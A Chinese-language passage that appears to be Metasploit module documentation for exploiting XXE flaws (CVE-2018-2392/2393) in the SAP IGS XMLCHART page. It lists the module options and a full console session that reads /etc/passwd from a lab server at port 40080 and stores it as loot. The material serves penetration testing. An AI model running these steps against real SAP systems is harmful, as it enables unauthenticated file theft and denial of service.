该模块利用了 CVE-2018-2392 和 CVE-2018-2393,这是 SAP Internet Graphics Servers (IGS) 运行版本 7.20、7.20EXT、7.45、7.49 或 7.53 的 XMLCHART 页面中的两个 XXE 漏洞。这些漏洞是由于在向 XMLCHART 页面提交 POST 请求以生成新图表时,未对 Extension HTML 标签进行适当验证而导致的。
成功利用将允许未经身份验证的远程攻击者从服务器读取文件,权限为启动 IGS 服务的用户,通常是 SAP 管理员用户。或者,攻击者也可以利用该 XXE 漏洞对易受攻击的 SAP IGS 服务器进行拒绝服务攻击。
Internet Graphics Services (IGS) 提供了一种基础设施,使开发人员能够以最小的努力在互联网浏览器中显示图形。它已集成到多种不同的 SAP UI 技术中,允许利用来自其他 SAP 系统或数据源的数据来生成动态图形或非图形输出。
在线可以找到安装和更新 SAP IGS 服务器的步骤,请参见此页面。有关配置 IGS 服务器的更多信息,请参见此处。最后,有关管理 IGS 服务器的信息,请参见此处。
一旦设置并配置完成,实例将在默认 HTTP 端口 40080 上变得易受攻击。
workspace [WORKSPACE]use auxiliary/admin/sap/sap_igs_xmlchart_xxeset RHOSTS [IP]set FILE [远程文件名]set action READcheckcheck 方法是否正确识别目标是否易受攻击。run要从远程服务器读取的文件。示例:/etc/passwd
这是 SAP IGS 服务器中易受 XXE 攻击的 XMLCHART 页面的路径。默认设置为 /XMLCHART,但如果 SAP IGS 服务器安装在 web 根目录下的不同路径,则可以更改。例如,如果 SAP IGS 服务器安装在 web 根目录下的 /igs/ 路径中,则该值应设置为 /igs/XMLCHART。
名称 描述
---- -----------
READ 远程文件读取
DOS 拒绝服务
msf6 > workspace -a SAP_TEST
[*] 添加的工作区:SAP_TEST
[*] 工作区:SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options
模块选项 (auxiliary/admin/sap/sap_igs_xmlchart_xxe):
名称 当前设置 必需 描述
---- --------------- -------- -----------
FILE /etc/passwd no 要从远程服务器读取的文件
Proxies http:127.0.0.1:8080 no 格式为 type:host:port[,type:host:port][...] 的代理链
RHOSTS 172.16.30.29 yes 目标主机,范围 CIDR 标识符,或语法为 'file:<path>' 的主机文件
RPORT 40080 yes 目标端口 (TCP)
SSL false no 为传出连接协商 SSL/TLS
URIPATH /XMLCHART yes 从 web 根目录到 SAP IGS XMLCHART 页面的路径
VHOST no HTTP 服务器虚拟主机
辅助动作:
名称 描述
---- -----------
READ 远程文件读取
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - 目标易受攻击。运行操作系统:SUSE Linux Enterprise Server for SAP Applications 12 SP1 的 172.16.30.29 返回的响应表明其 XMLCHART 页面容易受到 XXE 攻击!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] 正在针对 172.16.30.29 运行模块
[+] 来自主机 172.16.30.29 的文件:/etc/passwd 内容
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] 文件:/etc/passwd 已保存至:/Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] 辅助模块执行完成
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
服务
======
host port proto name state info
---- ---- ----- ---- ----- ----
172.16.30.29 40080 tcp http open SAP Internet Graphics Server (IGS)
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns
漏洞
========
时间戳 主机 名称 参考
--------- ---- ---- ----------
2020-10-07 10:12:37 UTC 172.16.30.29 SAP Internet Graphics Server (IGS) XMLCHART XXE CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot
战利品
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
172.16.30.29 igs.xmlchart.xxe /etc/passwd text/plain SAP IGS XMLCHART XXE /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt


